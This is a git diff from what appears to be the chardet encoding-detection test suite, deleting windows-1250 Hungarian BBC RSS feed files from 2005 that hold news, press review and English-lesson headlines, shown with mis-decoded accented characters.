http://www.bbc.co.uk/hungarian/ - Story, News - - - Rice: reformokra יs nyםltsבgra van szksיg zbegisztבnban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_riceuzbek.shtml - Condoleezza Rice amerikai klgyminiszter nyםltsבgra יs reformokra szףlםtotta fel zbegisztבnt - 2005-05-18T06:47:33+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - A Bush-kormבnyzat dilemmבja - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_usbegbushreax.shtml - zbegisztבn az USA egyik kulcsfontossבgת szצvetsיgese a terrorizmus elleni harcban, de az orszבgban komoly emberjogi hiבnyossבgok vannak - 2005-05-18T13:55:19+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Hol a leginkבbb egyenlץek a nץk a fיrfiakkal? - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050518_womenequal.shtml - A Vilבggazdasבgi Fףrum 54 orszבgot tצmצrםtץ listבjבt Svיdorszבg vezeti, mםg Egyiptom az utolsף helyen בll - 2005-05-18T10:48:39+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Katonבk vigyבznak a rendre Andizsבnban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050517_usbekandijanstill.shtml - A vבrosban pבncיlozott csapatszבllםtף jבrmvek cirkבlnak, יs katonבk igazoltatnak minden utazףt a klצnbצzץ ellenץrzץpontokon - 2005-05-17T13:58:46+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - j tulajdonosa van a leghםresebb brit fociklubnak - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050517_manuglazernew.shtml - Malcolm Glazer zletember בtvette a teljes ellenץrzיst a Manchester United futballklub fצlצtt - 2005-05-17T11:53:15+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Kylie karrierje - http://www.bbc.co.uk/hungarian/specials/1624_kylie/index.shtml - - 2005-05-17T15:38:00+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Csillagok hבborתja - http://www.bbc.co.uk/hungarian/specials/166_cannes/ - - 2005-05-16T18:24:25+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Cannes-i filmfesztivבl - http://www.bbc.co.uk/hungarian/specials/1623_cannes/index.shtml - - 2005-05-12T13:17:52+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - XVI. Benedek יlete kיpekben - http://www.bbc.co.uk/hungarian/specials/1144_ratzinger_life/ - - 2005-04-20T10:55:22+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/hungarian/specials/1917_life_in_picture/index.shtml</link> - <description xml:lang="hu"/> - <dc:date>2005-04-02T21:34:33+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/external_link/2004/07/040719_euparliamnet.shtml"> - <title xml:lang="hu">Eurףpai Parlament - http://www.bbc.co.uk/hungarian/040610_eu_parliament.shtml - - 2005-03-21T17:07:23+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - A Birodalom Kora - http://www.bbc.co.uk/hungarian/specials/1555_ageofempire/ - - 2005-03-21T16:39:01+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/hungarian/specials/1332_uselex_04am/index.shtml</link> - <description xml:lang="hu"/> - <dc:date>2004-11-08T15:14:16+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/external_link/2004/11/041111_arafatlife.shtml"> - <title xml:lang="hu">Jasszer Arafat יlete kיpekben - http://www.bbc.co.uk/hungarian/specials/1043_arafatlife/ - - 2005-03-15T12:32:02+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - II. Jבnos Pבl temetיse - http://www.bbc.co.uk/hungarian/specials/1147_ppopefuneral/ - - 2005-04-08T11:18:55+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/hungarian/specials/1540_adams/index.shtml</link> - <description xml:lang="hu"/> - <dc:date>2004-09-20T19:24:32+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/external_link/2004/09/040907_uselections.shtml"> - <title xml:lang="hu"/> - <link>http://www.bbc.co.uk/hungarian/specials/1235_us_keybattlegr/index.shtml</link> - <description xml:lang="hu"/> - <dc:date>2004-09-07T14:49:30+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> -</rdf:RDF> \ No newline at end of file diff --git a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.learningenglish.xml b/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.learningenglish.xml deleted file mode 100644 index 71f4132..0000000 --- a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.learningenglish.xml +++ /dev/null @@ -1,280 +0,0 @@ -<?xml version="1.0" encoding="windows-1250"?> -<!-- -Source: http://www.bbc.co.uk/hungarian/learningenglish/index.rdf -Expect: windows-1250 ---> -<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:cc="http://web.resource.org/cc/" xmlns="http://purl.org/rss/1.0/"> - <channel rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/worldservice/us/index.shtml"> - <title>BBCHungarian.com | Angol nyelvleckיk | Hungarian Learning English index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/index.shtml - Jogvיdelem BBC 2004 - hu - 2005-06-16T18:46:34+00:00 - Jogvיdelem BBC 2004 : http://www.bbc.co.uk/hungarian/institutional/rss.shtml#copyright - BBCHungarian.com - hourly - 1 - 2005-06-16T18:46:34+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - http://www.bbc.co.uk/hungarian/images/furniture/syndication/bbchungarian_180x80.gif - - - Tiny robot cleaners - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/06/050613_nanocleaners.shtml - Amerikai kutatףk elkיszםtettיk a vilבg legkisebb kefיit, melynek szבlai ezerszer vיkonyabbak az emberi hajnבl - 2005-06-16T17:11:35+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Philippine sedition charges - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/06/050615_manila.shtml - A Flצp-szigeteki kormבny zendlיs szervezיsיvel vבdolja egyik korבbbi hםrszerzץjיt - 2005-06-16T18:36:44+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Google accused of breaching copyright rules - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050527_google.shtml - Szerzץi jogok megsיrtיsיvel vבdoljבk a Google-t, mivel az egyetemi kצnyvtבrak anyagait akarja megjelentetni - 2005-05-31T13:42:10+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - BBC strike - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050523_bbc.shtml - A BBC תjsבgםrףi יs technikusai 24 ףrבn בt sztrבjkoltak tiltakozבsul a tצbb ezer tervezett elbocsבtבs ellen - 2005-05-25T10:21:43+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Cannes film festival - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050511_cannes.shtml - A filmvilבg sztבrjai צsszegyltek Cannes-ban hogy rיszt vegyenek a vilבg legrangosabb filmfesztivבljבn - 2005-05-25T10:35:06+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Labour wins UK election - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050506_election.shtml - Nagy-Britannia miniszterelnצkיt, Tony Blairt harmadik alkalommal is תjravבlasztottבk - 2005-05-25T10:33:13+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Moscow VE Day - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050509_moscow_ve_day.shtml - Tצbb mint 50 orszבg vezetץje gylt צssze Moszkvבban, hogy megemlיkezzenek a Gyץzelem napjבrףl - 2005-05-25T10:25:15+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - WHO to discuss smallpox research - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/witn/2005/05/050518_smallpox.shtml - A WHO azt vitatja, engedיlyezzיk-e a tovבbbi kutatבsokat a himlץvםrussal kapcsolatban - 2005-05-25T10:24:20+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Witn, Learning English - - - Focus on Europe - http://www.bbc.co.uk/hungarian/specials/1617_focuseurope/ - A negyvenצt rיszes nyelvleckesorozat az Eurףpai Uniףval kapcsolatos szףkincset tartalmazza - 2004-12-01T11:40:18+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Get that job - http://www0.bbc.co.uk/hungarian/specials/1645_getthatjob/ - Nyelvleckesorozatunk az angol צnיletrajzםrבsra יs a felvיteli beszיlgetיsre valף felkיszlיsre irבnyul - 2004-12-01T11:51:56+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Extreme English - http://www0.bbc.co.uk/hungarian/specials/111_extreme_english/ - A Guiness Rekordok Kצnyve remek alkalom, hogy a mellיknevek kצzיp- יs felsץfokבt gyakoroljuk - 2004-11-29T11:42:15+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Buzzwords - http://www.bbc.co.uk/hungarian/specials/177_buzzwords/ - Tanfolyamunkat azoknak a divatos szavaknak יs kifejezיseknek szenteltk, melyeket gyakran hasznבlunk - 2004-11-29T10:43:20+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Language To Go - http://www.bbc.co.uk/hungarian/specials/1114_languagetogo/ - Ezek a nyelvleckיk olyan interjתkon alapulnak, amelyeket a BBC riportere kיszםtett egy angol utcבn - 2004-09-27T17:31:14+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Takeaway English - http://www.bbc.co.uk/hungarian/specials/1953_take_away/ - A Takeaway English, kצzיphaladף nyelvleckesorozat a mindennapi יlet klצnfיle helyzeteirץl - 2004-08-11T16:08:06+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - External Link - http://www.teachingenglish.org.uk/ - - 2004-07-26T15:44:29+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Business English - http://www.bbc.co.uk/worldservice/learningenglish/business/index.shtml - - 2004-07-26T15:49:46+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - News English - http://www.bbc.co.uk/worldservice/learningenglish/newsenglish/index.shtml - - 2004-07-26T15:49:17+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - - <link>http://www.bbc.co.uk/worldservice/learningenglish/radio/index.shtml</link> - <description xml:lang="hu"/> - <dc:date>2004-08-11T12:45:50+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, Learning English</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/external_link/2004/07/040726_wsenglish.shtml"> - <title xml:lang="hu"/> - <link>http://www.bbc.co.uk/worldservice/learningenglish/</link> - <description xml:lang="hu"/> - <dc:date>2004-08-11T12:39:14+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, Learning English</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/external_link/2004/08/040811_peopleofthecentury.shtml"> - <title xml:lang="hu">People of the Century - http://www.bbc.co.uk/hungarian/specials/1013_people/ - - 2004-09-27T17:08:37+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - - <link>http://www.bbc.co.uk/hungarian/specials/1210_englishexpressh/</link> - <description xml:lang="hu"/> - <dc:date>2004-09-27T18:12:04+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, Learning English</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/story/2004/07/040723_realaudiohelp.shtml"> - <title xml:lang="hu">Segםtsיg a hanganyagok meghallgatבsבhoz - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/learningenglish/story/2004/07/040723_realaudiohelp.shtml - Hogyan hallgassunk hanganyagokat - 2004-08-11T16:12:22+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Learning English - - \ No newline at end of file diff --git a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.pressreview.xml b/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.pressreview.xml deleted file mode 100644 index 5d37063..0000000 --- a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.pressreview.xml +++ /dev/null @@ -1,265 +0,0 @@ - - - - - BBCHungarian.com | Sajtףszemle | Hungarian Press Review index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/index.shtml - Jogvיdelem BBC 2004 - hu - 2005-06-27T02:19:49+00:00 - Jogvיdelem BBC 2004 : http://www.bbc.co.uk/hungarian/institutional/rss.shtml#copyright - BBCHungarian.com - hourly - 1 - 2005-06-27T02:19:49+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - http://www.bbc.co.uk/hungarian/images/furniture/syndication/bbchungarian_180x80.gif - - - 2005. jתnius 27., hיtfץ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050627_press.shtml - A vezetץ tיma, hogy a konzervatםvkיnt szבmon tartott Mahmoud Ahmadinejad nyerte az irבni elnצkvבlasztבst - 2005-06-27T02:18:31+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 24., pיntek - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050624_press.shtml - A mai eurףpai lapok םzekre szedik Tony Blairnek az Eurףpai Parlamentben elmondott beszיdיt - 2005-06-24T11:34:44+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 23., cstצrtצk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050623_press.shtml - A lapok zצme mיg mindםg az Eurףpai Uniף mתlt heti csתcstalבlkozףjבval foglalkozik - - 2005-06-23T04:07:20+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 22., szerda - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050622_press.shtml - A mai eurףpai lapok vבltozatos tיmבkkal foglalkoznak - 2005-06-22T05:21:26+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 21., kedd - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050621_press.shtml - Az eurףpai lapok tצbbsיge mיg ma is a brsszeli EU csתcsot יrtיkeli - 2005-06-21T05:18:22+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 20., hיtfץ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050620_press.shtml - Az eurףpai lapok vיlemיnye megoszlik arrףl, hogy kit vבdoljanak az EU csתcs fiaskףjביrt - 2005-06-20T01:40:27+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - Sajtףszemle - 2005. jתnius 17., pיntek - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050617_press.shtml - Az eurףpai sajtף ma is a brsszeli תniףs csתcs kיt fץ kיrdיsיvel foglalkozik - - 2005-06-17T02:20:38+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - Lapszemle - 2005. jתnius 16., cstצrtצk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050616_press.shtml - Az eurףpai lapok nagy rיsze a ma kezdץdץ uniףs csתccsal van elfoglalva יs legtצbbjk kudarcra szבmםt - - 2005-06-16T06:27:42+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 15., szerda - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050615_press.shtml - Az eurףpai lapok ma az Uniףs bdzsי kצrli megegyezיs lehetץsיgיt latolgatjבk. - 2005-06-15T03:47:57+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 14., kedd - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050614_press.shtml - Nyםlt tkצzet - London יs Pבrizs egyre hevesebb vitבja az EU kצltsיgvetיsrץl - 2005-06-14T02:03:30+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - 2005. jתnius 13., hיtfץ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/06/050613_press.shtml - Figyelemelterelיs vagy kצzponti kיrdיs a brit kצltsיgvetיsi visszatיrםtיs az eheti EU csתcs elץtt? - 2005-06-13T02:37:19+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - - Athיni יremtבblבzat - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2004/08/040812_medals_table.shtml - Az olimpiai יremtבblבzat aktuבlis בllבsa - 2004-08-12T19:20:46+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - BBC Monitoring - http://www.monitor.bbc.co.uk/ - - 2004-08-11T16:45:54+0000 - text/plain - hu - BBCHungarian.com - External Link, Press Review - - - BBC World Service novellapבlyבzat - http://www.bbc.co.uk/worldservice/specials/1210_shortstorycomp/index.shtml - - 2005-03-15T12:22:37+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Vezetץk יs esemיnyek - http://www.bbc.co.uk/hungarian/specials/1737_keypeoplevents/ - - 2005-03-11T13:05:46+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Klםmavבltozבs – a vilבg nיgy יgtבjבn - http://www.bbc.co.uk/hungarian/specials/1417_climate/ - - 2005-03-24T19:47:34+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Az AIDS kצvetkezmיnyei - http://www.bbc.co.uk/hungarian/specials/1148_impact_aids/ - - 2005-03-21T17:03:49+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/hungarian/040501_eu_guide.shtml</link> - <description xml:lang="hu"/> - <dc:date>2004-08-23T17:38:30+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/external_link/2004/07/040718_migrationspecial.shtml"> - <title xml:lang="hu">Migrבciףs robbanבs - http://www.bbc.co.uk/hungarian/specials/1142_factfile_migrat/ - - 2005-03-21T17:05:51+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - 2005. בprilis 4., hיtfץ - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/pressreview/story/2005/04/050404_press.shtml - Az eurףpai lapok nagy terjedelemben foglalkoznak a pבpa halבlבval - 2005-04-04T04:17:54+0000 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, Press Review - - \ No newline at end of file diff --git a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.xml b/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.xml deleted file mode 100644 index c921d68..0000000 --- a/chardet/tests/windows-1250-hungarian/bbc.co.uk.hu.xml +++ /dev/null @@ -1,710 +0,0 @@ - - - - - BBCHungarian.com | Nyitףlap | Hungarian News index - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/index.shtml - Jogvיdelem BBC 2004 - hu - 2005-06-27T09:54:11+00:00 - Jogvיdelem BBC 2004 : http://www.bbc.co.uk/hungarian/institutional/rss.shtml#copyright - BBCHungarian.com - hourly - 1 - 2005-06-27T09:54:11+00:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - http://www.bbc.co.uk/hungarian/images/furniture/syndication/bbchungarian_180x80.gif - - - Rumsfeld: mיg יvekig tarthat a lבzadבs Irakban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050627_rumsfeldiraq.shtml - Az amerikai vיdelmi miniszter elismerte azt is, hogy amerikai tisztviselץk tבrgyaltak iraki szunnita militבnsokkal - 2005-06-27T04:44:06+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Replץipar יs globבlis felmelegedיs - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050627_globalwarm.shtml - Jelenleg a vilבg replץgיpei a szיn-dioxid kibocsבtבsnak mintegy צt szבzalיkביrt felelץsek - 2005-06-27T09:47:09+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Vיget יrt a Glastonbury Fesztivבl - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050627_glastonbury.shtml - Vasבrnap יrt vיget a hםres Glastonbury Fesztivבl, amelyet pontosan 35 יve, 1970-ben rendeztek meg elץszצr - 2005-06-27T04:52:35+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - ײsszefogבsra buzdםt az תj irבni elnצk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050625_iran.shtml - Az תj irבni elnצk modern יs erץs iszlבm orszבgot szeretne lיtrehozni, amely mintakיnt szolgבlhat az egיsz vilבgnak - 2005-06-25T14:12:38+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Hatvandollבros rekordבron az olaj - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_oilsixty.shtml - A korבbbi rekord olajבrak sok gazdasבgi kבrt okoztak, יs hozzבjבrultak a globבlis gazdasבgi recessziףhoz is - 2005-06-24T11:59:13+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Japבn robotץrצk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_japanrobotguards.shtml - A japבn irodבkat יs bevבsבrlףkצzpontokat hamarosan robotok fogjבk vיdeni betolakodףk ellen - 2005-06-24T11:53:17+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Mandelson: 'Liberalizבlni kell az EU szolgבltatבsi piacבt' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_mandelson.shtml - Mandelson a BBC-nek azt mondta, az energia, telekommunikבciףs, vasתti יs postai szolgבltatבsok piacבt meg kell nyitni a verseny elץtt - 2005-06-24T13:58:15+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Kםnai cיg tett ajבnlatot az USA egyik legnagyobb olajtבrsasבgבra - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_chinausoil.shtml - Az Egyeslt ֱllamokban szenבtusi bizottsבgi meghallgatבson foglalkoztak a Kםna בltal tבmasztott תgymond "gazdasבgi fenyegetיssel". - 2005-06-24T16:33:25+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - William herceg diplomaosztףja - http://www.bbc.co.uk/hungarian/specials/1320_prince_william/index.shtml - - 2005-06-24T13:26:46+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Lיgi parבdי Pבrizsban - http://www.bbc.co.uk/hungarian/specials/1425_paris_show/index.shtml - - 2005-06-22T19:29:12+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Stonehenge napfordulף - http://www.bbc.co.uk/hungarian/specials/1832_stonehenge/ - - 2005-06-22T14:32:44+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Migrבciףs robbanבs - http://www.bbc.co.uk/hungarian/specials/1142_factfile_migrat/ - - 2005-03-21T17:05:51+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Wimbledon - http://www.bbc.co.uk/worldservice/learningenglish/sport/tennis/index.shtml - - 2005-06-21T11:03:49+0000 - text/plain - hu - BBCHungarian.com - External Link, Learning English - - - Live 8-ra kיszlve - http://www.bbc.co.uk/hungarian/specials/1432_live8/ - - 2005-06-01T14:04:24+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Frida Kahlo kיpei a Tate-ben - http://www.bbc.co.uk/hungarian/specials/142_frida_kahlo/ - - 2005-06-09T14:54:10+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - EU csתcstalבlkozף Brsszelben - http://www.bbc.co.uk/hungarian/specials/1452_brussels/index.shtml - - 2005-06-17T13:13:46+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Words in the news - http://www.bbc.co.uk/hungarian/learningenglish/ - - 2005-05-26T16:43:19+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Gazdasבgi klצnbsיgek az EU-n bell - http://www.bbc.co.uk/hungarian/specials/1010_eu_differences/ - - 2005-05-04T14:48:25+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Az A380 premierje - http://www.bbc.co.uk/hungarian/specials/1622_A380_jumbo/index.shtml - - 2005-06-13T15:57:40+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Tntetיsek Bolםviבban - http://www.bbc.co.uk/hungarian/specials/1641_bolivia/index.shtml - - 2005-06-10T15:48:28+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Vיrontבs Etiףpiבban - http://www.bbc.co.uk/hungarian/specials/1411_ethiopia/ - - 2005-06-09T14:47:25+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Elhunyt Anne Bancroft - http://www.bbc.co.uk/hungarian/specials/1456_anne_bankroft/index.shtml - - 2005-06-08T13:51:14+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Kylie karrierje - http://www.bbc.co.uk/hungarian/specials/1624_kylie/index.shtml - - 2005-05-17T15:38:00+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Nyolcvan יves Tony Curtis - http://www.bbc.co.uk/hungarian/specials/1341_tony_curtis/index.shtml - - 2005-06-03T12:55:35+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Hollandok a nיpszavazבs utבn - http://www.bbc.co.uk/hungarian/specials/125_dutch_no/index.shtml - - 2005-06-02T13:00:23+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Mיrfצldkצvek az EU tצrtיnetיben - http://www.bbc.co.uk/hungarian/specials/1142_eu_milestones/ - - 2005-03-21T17:02:06+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Eurףpai Parlament - http://www.bbc.co.uk/hungarian/040610_eu_parliament.shtml - - 2005-03-21T17:07:23+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Sokkol יs leszoktat? - http://www.bbc.co.uk/hungarian/specials/1740_mac_eu_smoke/index.shtml - - 2005-03-15T12:42:06+0000 - text/plain - hu - BBCHungarian.com - External Link, 